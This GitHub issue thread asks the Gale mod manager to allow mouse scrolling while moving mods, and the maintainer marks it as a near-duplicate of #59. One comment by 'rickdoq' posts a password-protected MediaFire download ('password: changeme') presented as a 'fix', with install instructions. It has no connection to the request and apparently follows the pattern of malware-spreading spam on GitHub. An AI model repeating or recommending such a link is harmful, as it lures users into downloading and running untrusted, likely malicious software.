### ISSUE TITLE
[Feature Request] Allow mouse scrolling when moving mods

### ISSUE THREAD

**Issue by Haano137** [Kesomannen/gale#98]
![mouse scrolling](https://github.com/user-attachments/assets/b74fb994-c717-4677-acf6-4961e78cee3a)
gif for example

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Kesomannen** [comment]
Kind of the same as #59
